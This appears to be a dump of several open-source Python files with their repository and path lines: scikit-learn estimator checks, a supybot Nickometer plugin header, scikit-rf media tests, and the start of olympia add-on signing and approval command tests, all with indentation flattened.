X_train_inf[0, 0] = np.inf
y = np.ones(10)
y[:5] = 0
y = multioutput_estimator_convert_y_2d(name, y)
error_string_fit = "Estimator doesn't check for NaN and inf in fit."
error_string_predict = ("Estimator doesn't check for NaN and inf in"
" predict.")
error_string_transform = ("Estimator doesn't check for NaN and inf in"
" transform.")
for X_train in [X_train_nan, X_train_inf]:
# catch deprecation warnings
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
# try to fit
try:
estimator.fit(X_train, y)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_fit, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_fit, Estimator, exc)
traceback.print_exc(file=sys.stdout)
raise exc
else:
raise AssertionError(error_string_fit, Estimator)
# actually fit
estimator.fit(X_train_finite, y)
# predict
if hasattr(estimator, "predict"):
try:
estimator.predict(X_train)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_predict, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_predict, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_predict, Estimator)
# transform
if hasattr(estimator, "transform"):
try:
estimator.transform(X_train)
except ValueError as e:
if 'inf' not in repr(e) and 'NaN' not in repr(e):
print(error_string_transform, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_transform, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_transform, Estimator)
def check_transformer_pickle(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
n_samples, n_features = X.shape
X = StandardScaler().fit_transform(X)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
if not hasattr(transformer, 'transform'):
return
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
random_state = np.random.RandomState(seed=12345)
y_ = np.vstack([y, 2 * y + random_state.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit(X, y_).transform(X)
pickled_transformer = pickle.dumps(transformer)
unpickled_transformer = pickle.loads(pickled_transformer)
pickled_X_pred = unpickled_transformer.transform(X)
assert_array_almost_equal(pickled_X_pred, X_pred)
def check_estimators_partial_fit_n_features(name, Alg):
# check if number of features changes between calls to partial_fit.
if not hasattr(Alg, 'partial_fit'):
return
X, y = make_blobs(n_samples=50, random_state=1)
X -= X.min()
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if isinstance(alg, ClassifierMixin):
classes = np.unique(y)
alg.partial_fit(X, y, classes=classes)
else:
alg.partial_fit(X, y)
assert_raises(ValueError, alg.partial_fit, X[:, :-1], y)
def check_clustering(name, Alg):
X, y = make_blobs(n_samples=50, random_state=1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
n_samples, n_features = X.shape
# catch deprecation and neighbors warnings
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if hasattr(alg, "n_clusters"):
alg.set_params(n_clusters=3)
set_random_state(alg)
if name == 'AffinityPropagation':
alg.set_params(preference=-100)
alg.set_params(max_iter=100)
# fit
alg.fit(X)
# with lists
alg.fit(X.tolist())
assert_equal(alg.labels_.shape, (n_samples,))
pred = alg.labels_
assert_greater(adjusted_rand_score(pred, y), 0.4)
# fit another time with ``fit_predict`` and compare results
if name is 'SpectralClustering':
# there is no way to make Spectral clustering deterministic :(
return
set_random_state(alg)
with warnings.catch_warnings(record=True):
pred2 = alg.fit_predict(X)
assert_array_equal(pred, pred2)
def check_clusterer_compute_labels_predict(name, Clusterer):
"""Check that predict is invariant of compute_labels"""
X, y = make_blobs(n_samples=20, random_state=0)
clusterer = Clusterer()
if hasattr(clusterer, "compute_labels"):
# MiniBatchKMeans
if hasattr(clusterer, "random_state"):
clusterer.set_params(random_state=0)
X_pred1 = clusterer.fit(X).predict(X)
clusterer.set_params(compute_labels=False)
X_pred2 = clusterer.fit(X).predict(X)
assert_array_equal(X_pred1, X_pred2)
def check_classifiers_one_label(name, Classifier):
error_string_fit = "Classifier can't train when only one class is present."
error_string_predict = ("Classifier can't predict when only one class is "
"present.")
rnd = np.random.RandomState(0)
X_train = rnd.uniform(size=(10, 3))
X_test = rnd.uniform(size=(10, 3))
y = np.ones(10)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# try to fit
try:
classifier.fit(X_train, y)
except ValueError as e:
if 'class' not in repr(e):
print(error_string_fit, Classifier, e)
traceback.print_exc(file=sys.stdout)
raise e
else:
return
except Exception as exc:
print(error_string_fit, Classifier, exc)
traceback.print_exc(file=sys.stdout)
raise exc
# predict
try:
assert_array_equal(classifier.predict(X_test), y)
except Exception as exc:
print(error_string_predict, Classifier, exc)
raise exc
def check_classifiers_train(name, Classifier):
X_m, y_m = make_blobs(random_state=0)
X_m, y_m = shuffle(X_m, y_m, random_state=7)
X_m = StandardScaler().fit_transform(X_m)
# generate binary problem from multi-class one
y_b = y_m[y_m != 2]
X_b = X_m[y_m != 2]
for (X, y) in [(X_m, y_m), (X_b, y_b)]:
# catch deprecation warnings
classes = np.unique(y)
n_classes = len(classes)
n_samples, n_features = X.shape
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name in ['BernoulliNB', 'MultinomialNB']:
X -= X.min()
set_fast_parameters(classifier)
set_random_state(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
# with lists
classifier.fit(X.tolist(), y.tolist())
assert_true(hasattr(classifier, "classes_"))
y_pred = classifier.predict(X)
assert_equal(y_pred.shape, (n_samples,))
# training set performance
if name not in ['BernoulliNB', 'MultinomialNB']:
assert_greater(accuracy_score(y, y_pred), 0.83)
# raises error on malformed input for predict
assert_raises(ValueError, classifier.predict, X.T)
if hasattr(classifier, "decision_function"):
try:
# decision_function agrees with predict
decision = classifier.decision_function(X)
if n_classes is 2:
assert_equal(decision.shape, (n_samples,))
dec_pred = (decision.ravel() > 0).astype(np.int)
assert_array_equal(dec_pred, y_pred)
if (n_classes is 3
and not isinstance(classifier, BaseLibSVM)):
# 1on1 of LibSVM works differently
assert_equal(decision.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(decision, axis=1), y_pred)
# raises error on malformed input
assert_raises(ValueError,
classifier.decision_function, X.T)
# raises error on malformed input for decision_function
assert_raises(ValueError,
classifier.decision_function, X.T)
except NotImplementedError:
pass
if hasattr(classifier, "predict_proba"):
# predict_proba agrees with predict
y_prob = classifier.predict_proba(X)
assert_equal(y_prob.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(y_prob, axis=1), y_pred)
# check that probas for all classes sum to one
assert_array_almost_equal(np.sum(y_prob, axis=1),
np.ones(n_samples))
# raises error on malformed input
assert_raises(ValueError, classifier.predict_proba, X.T)
# raises error on malformed input for predict_proba
assert_raises(ValueError, classifier.predict_proba, X.T)
def check_estimators_fit_returns_self(name, Estimator):
"""Check if self is returned when calling fit"""
X, y = make_blobs(random_state=0, n_samples=9, n_features=4)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
assert_true(estimator.fit(X, y) is estimator)
@ignore_warnings
def check_estimators_unfitted(name, Estimator):
"""Check that predict raises an exception in an unfitted estimator.
Unfitted estimators should raise either AttributeError or ValueError.
The specific exception type NotFittedError inherits from both and can
therefore be adequately raised for that purpose.
"""
# Common test for Regressors as well as Classifiers
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
est = Estimator()
msg = "fit"
if hasattr(est, 'predict'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict, X)
if hasattr(est, 'decision_function'):
assert_raise_message((AttributeError, ValueError), msg,
est.decision_function, X)
if hasattr(est, 'predict_proba'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict_proba, X)
if hasattr(est, 'predict_log_proba'):
assert_raise_message((AttributeError, ValueError), msg,
est.predict_log_proba, X)
def check_classifiers_input_shapes(name, Classifier):
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=1)
X = StandardScaler().fit_transform(X)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
set_random_state(classifier)
# Check that when a 2D y is given, a DataConversionWarning is
# raised
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DataConversionWarning)
warnings.simplefilter("ignore", RuntimeWarning)
classifier.fit(X, y[:, np.newaxis])
msg = "expected 1 DataConversionWarning, got: %s" % (
", ".join([str(w_x) for w_x in w]))
assert_equal(len(w), 1, msg)
assert_array_equal(y_pred, classifier.predict(X))
def check_classifiers_classes(name, Classifier):
X, y = make_blobs(n_samples=30, random_state=0, cluster_std=0.1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
# We need to make sure that we have non negative data, for things
# like NMF
X -= X.min() - .1
y_names = np.array(["one", "two", "three"])[y]
for y_names in [y_names, y_names.astype('O')]:
if name in ["LabelPropagation", "LabelSpreading"]:
# TODO some complication with -1 label
y_ = y
else:
y_ = y_names
classes = np.unique(y_)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name == 'BernoulliNB':
classifier.set_params(binarize=X.mean())
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y_)
y_pred = classifier.predict(X)
# training set performance
assert_array_equal(np.unique(y_), np.unique(y_pred))
if np.any(classifier.classes_ != classes):
print("Unexpected classes_ attribute for %r: "
"expected %s, got %s" %
(classifier, classes, classifier.classes_))
def check_classifiers_pickle(name, Classifier):
X, y = make_blobs(random_state=0)
X, y = shuffle(X, y, random_state=7)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
pickled_classifier = pickle.dumps(classifier)
unpickled_classifier = pickle.loads(pickled_classifier)
pickled_y_pred = unpickled_classifier.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_regressors_int(name, Regressor):
X, _ = _boston_subset()
X = X[:50]
rnd = np.random.RandomState(0)
y = rnd.randint(3, size=X.shape[0])
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
regressor_1 = Regressor()
regressor_2 = Regressor()
set_fast_parameters(regressor_1)
set_fast_parameters(regressor_2)
set_random_state(regressor_1)
set_random_state(regressor_2)
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
# fit
regressor_1.fit(X, y_)
pred1 = regressor_1.predict(X)
regressor_2.fit(X, y_.astype(np.float))
pred2 = regressor_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_regressors_train(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name == 'PassiveAggressiveRegressor':
regressor.C = 0.01
# raises error on malformed input for fit
assert_raises(ValueError, regressor.fit, X, y[:-1])
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
set_random_state(regressor)
regressor.fit(X, y_)
regressor.fit(X.tolist(), y_.tolist())
y_pred = regressor.predict(X)
assert_equal(y_pred.shape, y_.shape)
# TODO: find out why PLS and CCA fail. RANSAC is random
# and furthermore assumes the presence of outliers, hence
# skipped
if name not in ('PLSCanonical', 'CCA', 'RANSACRegressor'):
print(regressor)
assert_greater(regressor.score(X, y_), 0.5)
def check_regressors_pickle(name, Regressor):
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
regressor.fit(X, y_)
y_pred = regressor.predict(X)
# store old predictions
pickled_regressor = pickle.dumps(regressor)
unpickled_regressor = pickle.loads(pickled_regressor)
pickled_y_pred = unpickled_regressor.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
@ignore_warnings
def check_regressors_no_decision_function(name, Regressor):
# checks whether regressors have decision_function or predict_proba
rng = np.random.RandomState(0)
X = rng.normal(size=(10, 4))
y = multioutput_estimator_convert_y_2d(name, X[:, 0])
regressor = Regressor()
set_fast_parameters(regressor)
if hasattr(regressor, "n_components"):
# FIXME CCA, PLS is not robust to rank 1 effects
regressor.n_components = 1
regressor.fit(X, y)
funcs = ["decision_function", "predict_proba", "predict_log_proba"]
for func_name in funcs:
func = getattr(regressor, func_name, None)
if func is None:
# doesn't have function
continue
# has function. Should raise deprecation warning
msg = func_name
assert_warns_message(DeprecationWarning, msg, func, X)
def check_class_weight_classifiers(name, Classifier):
if name == "NuSVC":
# the sparse version has a parameter that doesn't do anything
raise SkipTest
if name.endswith("NB"):
# NaiveBayes classifiers have a somewhat different interface.
# FIXME SOON!
raise SkipTest
for n_centers in [2, 3]:
# create a very noisy dataset
X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5,
random_state=0)
n_centers = len(np.unique(y_train))
if n_centers == 2:
class_weight = {0: 1000, 1: 0.0001}
else:
class_weight = {0: 1000, 1: 0.0001, 2: 0.0001}
with warnings.catch_warnings(record=True):
classifier = Classifier(class_weight=class_weight)
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
if hasattr(classifier, "min_weight_fraction_leaf"):
classifier.set_params(min_weight_fraction_leaf=0.01)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
assert_greater(np.mean(y_pred == 0), 0.89)
def check_class_weight_balanced_classifiers(name, Classifier, X_train, y_train,
X_test, y_test, weights):
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
classifier.set_params(class_weight='balanced')
classifier.fit(X_train, y_train)
y_pred_balanced = classifier.predict(X_test)
assert_greater(f1_score(y_test, y_pred_balanced, average='weighted'),
f1_score(y_test, y_pred, average='weighted'))
def check_class_weight_balanced_linear_classifier(name, Classifier):
"""Test class weights with non-contiguous class labels."""
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = np.array([1, 1, 1, -1, -1])
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
# This is a very small dataset, default n_iter are likely to prevent
# convergence
classifier.set_params(n_iter=1000)
set_random_state(classifier)
# Let the model compute the class frequencies
classifier.set_params(class_weight='balanced')
coef_balanced = classifier.fit(X, y).coef_.copy()
# Count each label occurrence to reweight manually
n_samples = len(y)
n_classes = float(len(np.unique(y)))
class_weight = {1: n_samples / (np.sum(y == 1) * n_classes),
-1: n_samples / (np.sum(y == -1) * n_classes)}
classifier.set_params(class_weight=class_weight)
coef_manual = classifier.fit(X, y).coef_.copy()
assert_array_almost_equal(coef_balanced, coef_manual)
def check_estimators_overwrite_params(name, Estimator):
X, y = make_blobs(random_state=0, n_samples=9)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
with warnings.catch_warnings(record=True):
# catch deprecation warnings
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
# Make a physical copy of the orginal estimator parameters before fitting.
params = estimator.get_params()
original_params = deepcopy(params)
# Fit the model
estimator.fit(X, y)
# Compare the state of the model parameters with the original parameters
new_params = estimator.get_params()
for param_name, original_value in original_params.items():
new_value = new_params[param_name]
# We should never change or mutate the internal state of input
# parameters by default. To check this we use the joblib.hash function
# that introspects recursively any subobjects to compute a checksum.
# The only exception to this rule of immutable constructor parameters
# is possible RandomState instance but in this check we explicitly
# fixed the random_state params recursively to be integer seeds.
assert_equal(hash(new_value), hash(original_value),
"Estimator %s should not change or mutate "
" the parameter %s from %s to %s during fit."
% (name, param_name, original_value, new_value))
def check_sparsify_coefficients(name, Estimator):
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1],
[-1, -2], [2, 2], [-2, -2]])
y = [1, 1, 1, 2, 2, 2, 3, 3, 3]
est = Estimator()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_classifier_data_not_an_array(name, Estimator):
X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_regressor_data_not_an_array(name, Estimator):
X, y = _boston_subset(n_samples=50)
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_estimators_data_not_an_array(name, Estimator, X, y):
if name in CROSS_DECOMPOSITION:
raise SkipTest
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
estimator_1 = Estimator()
estimator_2 = Estimator()
set_fast_parameters(estimator_1)
set_fast_parameters(estimator_2)
set_random_state(estimator_1)
set_random_state(estimator_2)
y_ = NotAnArray(np.asarray(y))
X_ = NotAnArray(np.asarray(X))
# fit
estimator_1.fit(X_, y_)
pred1 = estimator_1.predict(X_)
estimator_2.fit(X, y)
pred2 = estimator_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_parameters_default_constructible(name, Estimator):
classifier = LDA()
# test default-constructibility
# get rid of deprecation warnings
with warnings.catch_warnings(record=True):
if name in META_ESTIMATORS:
estimator = Estimator(classifier)
else:
estimator = Estimator()
# test cloning
clone(estimator)
# test __repr__
repr(estimator)
# test that set_params returns self
assert_true(estimator.set_params() is estimator)
# test if init does nothing but set parameters
# this is important for grid_search etc.
# We get the default parameters from init and then
# compare these against the actual values of the attributes.
# this comes from getattr. Gets rid of deprecation decorator.
init = getattr(estimator.__init__, 'deprecated_original',
estimator.__init__)
try:
args, varargs, kws, defaults = inspect.getargspec(init)
except TypeError:
# init is not a python function.
# true for mixins
return
params = estimator.get_params()
if name in META_ESTIMATORS:
# they need a non-default argument
args = args[2:]
else:
args = args[1:]
if args:
# non-empty list
assert_equal(len(args), len(defaults))
else:
return
for arg, default in zip(args, defaults):
assert_in(type(default), [str, int, float, bool, tuple, type(None),
np.float64, types.FunctionType, Memory])
if arg not in params.keys():
# deprecated parameter, not in get_params
assert_true(default is None)
continue
if isinstance(params[arg], np.ndarray):
assert_array_equal(params[arg], default)
else:
assert_equal(params[arg], default)
def multioutput_estimator_convert_y_2d(name, y):
# Estimators in mono_output_task_error raise ValueError if y is of 1-D
# Convert into a 2-D y for those estimators.
if name in (['MultiTaskElasticNetCV', 'MultiTaskLassoCV',
'MultiTaskLasso', 'MultiTaskElasticNet']):
return y[:, np.newaxis]
return y
def check_non_transformer_estimators_n_iter(name, estimator,
multi_output=False):
# Check if all iterative solvers, run for more than one iteratiom
iris = load_iris()
X, y_ = iris.data, iris.target
if multi_output:
y_ = y_[:, np.newaxis]
set_random_state(estimator, 0)
if name == 'AffinityPropagation':
estimator.fit(X)
else:
estimator.fit(X, y_)
assert_greater(estimator.n_iter_, 0)
def check_transformer_n_iter(name, estimator):
if name in CROSS_DECOMPOSITION:
# Check using default data
X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]]
y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]]
else:
X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min() - 0.1
set_random_state(estimator, 0)
estimator.fit(X, y_)
# These return a n_iter per component.
if name in CROSS_DECOMPOSITION:
for iter_ in estimator.n_iter_:
assert_greater(iter_, 1)
else:
assert_greater(estimator.n_iter_, 1)
def check_get_params_invariance(name, estimator):
class T(BaseEstimator):
"""Mock classifier
"""
def __init__(self):
pass
def fit(self, X, y):
return self
if name in ('FeatureUnion', 'Pipeline'):
e = estimator([('clf', T())])
elif name in ('GridSearchCV' 'RandomizedSearchCV'):
return
else:
e = estimator()
shallow_params = e.get_params(deep=False)
deep_params = e.get_params(deep=True)
assert_true(all(item in deep_params.items() for item in
shallow_params.items()))
|
jeffmahoney/supybot
|
refs/heads/urlsnarfer
|
plugins/Nickometer/__init__.py
|
15
|
###
# Copyright (c) 2004, William Robinson.
# Derived from work (c) 1998, Adam Spiers <adam.spiers@new.ox.ac.uk>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
###
# This algorithm is almost a direct from a the perl nickometer from
# blootbot. Hardly any of the original code has been used, though most of
# the comments, I copy-pasted. As a matter of courtesy, the original copyright
# message follows:
#
# #
# # Lame-o-Nickometer backend
# #
# # (c) 1998 Adam Spiers <adam.spiers@new.ox.ac.uk>
# #
# # You may do whatever you want with this code, but give me credit.
# #
# # $Id: Nickometer.py,v 1.13 2004/10/22 22:19:30 jamessan Exp $
# #
###
"""
A port of Infobot's nickometer command from Perl. This plugin
provides one command (called nickometer) which will tell you how 'lame'
an IRC nick is. It's an elitist hacker thing, but quite fun.
"""
import supybot
import supybot.world as world
# Use this for the version of this plugin. You may wish to put a CVS keyword
# in here if you're keeping the plugin in CVS or some similar system.
__version__ = ""
# XXX Replace this with an appropriate author or supybot.Author instance.
__author__ = supybot.authors.baggins
# This is a dictionary mapping supybot.Author instances to lists of
# contributions.
__contributors__ = {}
import config
import plugin
reload(plugin) # In case we're being reloaded.
# Add more reloads here if you add third-party modules and want them to be
# reloaded when this plugin is reloaded. Don't forget to import them as well!
if world.testing:
import test
Class = plugin.Class
configure = config.configure
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
aerialist/scikit-rf
|
refs/heads/master
|
skrf/media/tests/test_media.py
|
6
|
import unittest
import os
import numpy as npy
from skrf.media import DefinedGammaZ0, Media
from skrf.network import Network
from skrf.frequency import Frequency
import skrf
class DefinedGammaZ0TestCase(unittest.TestCase):
def setUp(self):
self.files_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
'qucs_prj'
)
self.dummy_media = DefinedGammaZ0(
frequency = Frequency(1,100,21,'ghz'),
gamma=1j,
z0 = 50 ,
)
def test_impedance_mismatch(self):
'''
'''
fname = os.path.join(self.files_dir,\
'impedanceMismatch,50to25.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.thru(z0=50)**\
self.dummy_media.thru(z0=25)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_resistor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'resistor,1ohm.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.resistor(1)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_capacitor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'capacitor,p01pF.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.capacitor(.01e-12)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_inductor(self):
'''
'''
fname = os.path.join(self.files_dir,\
'inductor,p1nH.s2p')
qucs_ntwk = Network(fname)
self.dummy_media.frequency = qucs_ntwk.frequency
skrf_ntwk = self.dummy_media.inductor(.1e-9)
self.assertEqual(qucs_ntwk, skrf_ntwk)
def test_scalar_gamma_z0_media(self):
'''
test ability to create a Media from scalar quanties for gamma/z0
and change frequency resolution
'''
a = DefinedGammaZ0 (Frequency(1,10,101),gamma=1j,z0 = 50)
self.assertEqual(a.line(1),a.line(1))
# we should be able to re-sample the media
a.npoints = 21
self.assertEqual(len(a.gamma), len(a))
self.assertEqual(len(a.z0), len(a))
self.assertEqual(len(a.z0), len(a))
def test_vector_gamma_z0_media(self):
'''
test ability to create a Media from vector quanties for gamma/z0
'''
freq = Frequency(1,10,101)
a = DefinedGammaZ0(freq,
gamma = 1j*npy.ones(len(freq)) ,
z0 = 50*npy.ones(len(freq)),
)
self.assertEqual(a.line(1),a.line(1))
with self.assertRaises(NotImplementedError):
a.npoints=4
def test_write_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
os.remove(fname)
def test_from_csv(self):
fname = os.path.join(self.files_dir,\
'out.csv')
self.dummy_media.write_csv(fname)
a_media = DefinedGammaZ0.from_csv(fname)
self.assertEqual(a_media,self.dummy_media)
os.remove(fname)
|
dezynetechnologies/odoo
|
refs/heads/8.0
|
addons/google_drive/__init__.py
|
437
|
import google_drive
|
hisie/django-select2
|
refs/heads/master
|
tests/testapp/__init__.py
|
12133432
| |
CSC-ORG/Dynamic-Dashboard-2015
|
refs/heads/master
|
engine/api/analytics/valid/__init__.py
|
12133432
| |
mstriemer/addons-server
|
refs/heads/master
|
src/olympia/addons/tests/test_commands.py
|
3
|
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import CommandError
import pytest
from olympia import amo
from olympia.addons.management.commands import approve_addons
from olympia.amo.tests import addon_factory
from olympia.devhub.models import AddonLog
from olympia.editors.models import ReviewerScore
# Where to monkeypatch "lib.crypto.tasks.sign_addons" so it's correctly mocked.
SIGN_ADDONS = 'olympia.addons.management.commands.sign_addons.sign_addons'
# Test the "sign_addons" command.
def test_no_overridden_settings(monkeypatch):
assert not settings.SIGNING_SERVER
def no_endpoint(ids, **kwargs):
assert not settings.SIGNING_SERVER
monkeypatch.setattr(SIGN_ADDONS, no_endpoint)
call_command('sign_addons', 123)
def test_override_SIGNING_SERVER_setting(monkeypatch):
"""You can override the SIGNING_SERVER settings."""
assert not settings.SIGNING_SERVER
def signing_server(ids, **kwargs):
assert settings.SIGNING_SERVER == 'http://example.com'
monkeypatch.setattr(SIGN_ADDONS, signing_server)
call_command('sign_addons', 123, signing_server='http://example.com')
def test_force_signing(monkeypatch):
"""You can force signing an addon even if it's already signed."""
def not_forced(ids, force, reason):
assert not force
monkeypatch.setattr(SIGN_ADDONS, not_forced)
call_command('sign_addons', 123)
def is_forced(ids, force, reason):
assert force
monkeypatch.setattr(SIGN_ADDONS, is_forced)
call_command('sign_addons', 123, force=True)
def test_reason(monkeypatch):
"""You can pass a reason."""
def has_reason(ids, force, reason):
assert reason == 'expiry'
monkeypatch.setattr(SIGN_ADDONS, has_reason)
call_command('sign_addons', 123, reason='expiry')
# Test the "approve_addons" command.
@pytest.mark.django_db
def test_approve_addons_get_files_incomplete():
"""An incomplete add-on can't be approved."""
addon = addon_factory(status=amo.STATUS_NULL)
assert approve_addons.get_files([addon.guid]) == []
@pytest.mark.django_db
def test_approve_addons_get_files_bad_guid():
"""An add-on with another guid doesn't get approved."""
